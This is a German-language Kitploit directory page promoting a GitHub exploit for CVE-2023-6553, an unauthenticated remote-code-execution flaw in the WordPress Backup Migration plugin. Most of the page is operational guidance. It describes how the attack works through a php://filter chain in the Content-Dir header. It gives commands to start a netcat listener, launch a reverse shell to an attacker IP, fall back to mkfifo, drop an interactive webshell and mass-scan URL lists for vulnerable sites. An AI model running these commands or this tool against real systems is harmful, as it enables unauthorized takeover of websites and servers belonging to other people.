Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
WordPress_Backup_Migration-RCE_Unauthenticated — Dieser Exploit basiert auf CVE-2023-6553 und wurde auf dem ursprünglichen Exploit von Chocapik aufgebaut, es wurde hinzugefügt, dass eine direkte Reverse-Shell erhalten werden kann. | Kitploit
Tools/GitHubGitHub/joaoaugustom/wordpress_backup_migration-rce_unauthenticated
Exploit-FrameworksSchwachstellenanalyseWebanwendungs-ExploitationPenetrationstestsCommand and ControlPayload-Entwicklung
GitHubjoaoaugustom/wordpress_backup_migration-rce_unauthenticated

WordPress_Backup_Migration-RCE_Unauthenticated

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Dieser Exploit basiert auf CVE-2023-6553 und wurde auf dem ursprünglichen Exploit von Chocapik aufgebaut, es wurde hinzugefügt, dass eine direkte Reverse-Shell erhalten werden kann.

Repository anzeigen
1vor 12 TagenNoch nicht geprüft

CVE-2023-6553 — Das Backup Migration Plugin für WordPress - Reverse Shell

Eine erweiterte Version von Chocapikk's CVE-2023-6553 Exploit, die einen Reverse-Shell-Modus mit einem Befehl zusätzlich zur ursprünglichen interaktiven Webshell hinzufügt.


Schwachstelle

CVE-2023-6553 — Nicht authentifizierte Remote-Code-Ausführung im Backup Migration WordPress-Plugin (Versionen ≤ 1.3.7).

Das Plugin stellt backup-heart.php bereit, das eine PHP-Filter-Kette aus dem HTTP-Header Content-Dir liest und ohne Authentifizierung oder Bereinigung an include() übergibt. Dadurch kann ein nicht authentifizierter Angreifer beliebigen PHP-Code ausführen, indem er eine manipulierte php://filter-Kette injiziert.

  • CVSS: 9.8 (Kritisch)
  • Plugin: Backup Migration ≤ 1.3.7
  • Referenz: WPScan

Danksagungen

Ursprünglicher Exploit von Chocapikk — die gesamte Kern-Exploit-Logik (Filterketten-Generierung, Dateischreiben, interaktive Shell) stammt von ihm. Dieses Repository erweitert sie lediglich um einen Reverse-Shell-Trigger-Modus.


Unterschiede zum Original

Die einzigen Ergänzungen sind:

  1. trigger_reverse_shell()-Methode — sendet nach dem Bereitstellen der Webshell (gleicher Prozess wie im Original) eine einzelne GET-Anfrage mit dem Reverse-Shell-Befehl als 0-Parameter, genau wie die interaktive Shell es tun würde.
  2. 4 neue argparse-Argumente — um den Reverse-Shell-Modus zu aktivieren und zu konfigurieren.
  3. 5 Zeilen in main() — tauscht interactive_shell() gegen trigger_reverse_shell() aus, wenn -r vorhanden ist.

Alles andere — Schwachstellenprüfung, Dateischreibschleife, Kopieren/Löschen, interaktiver Modus, Multi-URL-Scanning — bleibt unverändert vom Original.


Voraussetzungen

root@kitploit:~
pip install requests rich alive-progress prompt-toolkit php-filter-chain

Verwendung

Reverse-Shell-Modus (neu)

root@kitploit:~
# Start your listener first
rlwrap nc -lvnp 4444

# Run the exploit
python3 exploit.py -u http://TARGET/blog -r -l YOUR_IP -p 4444

Falls bash /dev/tcp auf dem Ziel nicht verfügbar ist, verwenden Sie mkfifo (nutzt stattdessen nc):

root@kitploit:~
python3 exploit.py -u http://TARGET/blog -r -l YOUR_IP -p 4444 --shell mkfifo

Interaktiver Webshell-Modus (ursprüngliches Verhalten)

root@kitploit:~
python3 exploit.py -u http://TARGET/blog

Nur Schwachstellenprüfung

root@kitploit:~
python3 exploit.py -u http://TARGET/blog -c

Liste von URLs scannen

root@kitploit:~
python3 exploit.py -f urls.txt -t 10 -o vulnerable.txt

Alle Argumente

root@kitploit:~
-u / --url      Target base URL (e.g. http://target/blog)
-r / --revshell Enable reverse shell mode
-l / --lhost    Your IP to receive the shell (required with -r)
-p / --lport    Your listener port (default: 4444)
     --shell    Shell type: bash (default) or mkfifo
-c / --check    Check vulnerability only, do not deploy shell
-f / --file     File with list of URLs to scan
-t / --threads  Threads for multi-URL scan (default: 5)
-o / --output   Output file for scan results

Funktionsweise

root@kitploit:~
1. POST /wp-content/plugins/backup-backup/includes/backup-heart.php
   Content-Dir: php://filter/...<encoded PHP>
   → Writes webshell char by char to a temp file
   → Copies temp file to <random>.php

2. GET /wp-content/plugins/backup-backup/includes/<random>.php?0=<cmd>
   → Executes command via backtick operator
   → Interactive mode: loops reading commands from stdin
   → Reverse shell mode: sends bash/mkfifo one-liner, connects to listener

3. Cleanup: unlink(<random>.php)

Haftungsausschluss

Dieses Tool ist ausschließlich für autorisierte Penetrationstests und Sicherheitsforschung bestimmt. Verwenden Sie es nicht gegen Systeme, für die Sie keine ausdrückliche Erlaubnis zum Testen haben.

Tool herunterladen
FunktionOriginal (Chocapikk)Diese Version
Interaktive Webshell✅✅ (unverändert)
Reverse Shell❌✅ (-r)
Multi-URL-Scanning✅✅ (unverändert)
Neue Argumente—-r, -l, -p, --shell